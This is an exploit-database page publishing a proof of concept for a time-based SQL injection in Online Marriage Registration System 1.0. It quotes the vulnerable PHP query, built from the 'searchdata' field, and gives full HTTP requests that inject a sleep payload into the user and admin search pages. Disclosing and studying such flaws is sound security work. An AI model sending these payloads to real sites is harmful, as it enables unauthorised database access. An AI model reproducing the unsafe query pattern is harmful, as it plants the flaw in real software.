0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Online Marriage Registration System 1.0 - (searchdata) SQL Injection Vulnerability

Author

Raffaele Sabato

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0

I DESCRIPTION
========================================================================

A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. 
Following the vulnerable code:

$sdata=$_POST['searchdata'];
  ?>
  <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>  
            <table id="datatable1" class="table display responsive nowrap">
              <thead>
                <tr>
                  <th class="wd-15p">S.No</th>
                
                  <th class="wd-15p">Reg Number</th>
                  <th class="wd-20p">Husband Name</th>
                  
                  <th class="wd-10p">Date of Marriage</th>
                  <th class="wd-10p">Status</th>
                  <th class="wd-25p">Action</th>
                </tr>
              </thead>
              <tbody>
                <?php
                $uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);

II PROOF OF CONCEPT
========================================================================

## Request user

POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1

-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"

' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"


-----------------------------197361427118054779422510078884--

## Request admin

POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1

-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"

' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"


-----------------------------267799269040335247322746025522--

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Online Marriage Registration System 1.0 - (searchdata) SQL Injection Vulnerability

Report Error

Report Error